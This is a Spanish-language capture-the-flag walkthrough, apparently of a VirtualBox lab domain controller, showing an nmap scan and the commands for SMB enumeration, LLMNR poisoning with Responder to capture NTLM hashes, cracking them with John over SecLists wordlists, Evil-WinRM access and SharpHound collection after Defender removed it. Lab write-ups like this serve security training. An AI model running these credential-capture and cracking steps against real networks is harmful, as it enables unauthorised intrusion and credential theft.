Curiosity2

Un escaneo inicial:

 sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 192.168.1.45
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-12 12:33 EDT
Stats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 78.95% done; ETC: 12:34 (0:00:13 remaining)
Nmap scan report for 192.168.1.45
Host is up (0.0017s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Simple DNS Plus
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-12 16:34:00Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
|_ssl-date: 2025-05-12T16:34:56+00:00; 0s from scanner time.
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
|_ssl-date: 2025-05-12T16:34:56+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
|_ssl-date: 2025-05-12T16:34:56+00:00; 0s from scanner time.
3269/tcp  open   ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
|_ssl-date: 2025-05-12T16:34:56+00:00; 0s from scanner time.
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open   mc-nmf        .NET Message Framing
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49670/tcp closed unknown
49672/tcp closed unknown
49673/tcp closed unknown
49676/tcp closed unknown
49693/tcp open   msrpc         Microsoft Windows RPC
57936/tcp open   ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   192.168.1.45\SQLEXPRESS: 
|     Instance name: SQLEXPRESS
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 57936
|_    Clustered: false
|_ssl-date: 2025-05-12T16:34:56+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
| ms-sql-ntlm-info: 
|   192.168.1.45\SQLEXPRESS: 
|     Target_Name: CONS
|     NetBIOS_Domain_Name: CONS
|     NetBIOS_Computer_Name: WIN-C73PROQLRHL
|     DNS_Domain_Name: cons.thl
|     DNS_Computer_Name: WIN-C73PROQLRHL.cons.thl
|_    Product_Version: 10.0.14393
64632/tcp closed unknown
64659/tcp closed unknown
MAC Address: 08:00:27:6B:26:18 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-C73PROQLRHL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN-C73PROQLRHL, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:6b:26:18 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2025-05-12T16:34:48
|_  start_date: 2025-05-12T16:19:29
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.40 seconds

Ahora con nxc

  • Verificamos un poco de info de la maquina:

nxc smb 192.168.1.45

Tenemos un dominio: const.thl y un nombre de máquina WIN-C73PROQLRHL.

Agregamos el dominio y el FQDN a nuestro archivo /etc/hosts:

echo '192.168.1.45 cons.thl WIN-C73PROQLRHL.cons.thl' | sudo tee -a /etc/hosts

Podemos entonces empezar un LLMNR poisoner con Responder y, eventualmente, obtener algo:

Herramienta:

LogoGitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.GitHub
sudo responder -I eth0
Obtenemos dos hash

Si intentamos performar un Brute Force Password Cracking con JohnTheRipper y el diccionario rockyou.txt no somos capaces de crackearlo. Como sea, si usamos otras contraseñas del repositorio SecLists (en un pequeño “for” loop con Bash) obtenemos algo:

 for dict in *.txt; do echo -e "\n\n[+] Attempting with dictionary $dict"; john --wordlist=$dict hash.hash; done

Podemos ver que el usuario Appolonia pertenece al grupo ManagedUsers:

Entramos con Evil-WinRM:

Al usar SharpHound

  • Este se borro por el WindowsDefender:

Probaremos otro repo y funciono ya tenemos .zip lo pasamos al Bloodhound:

PreviousB.I.GNextTryHackMe

Last updated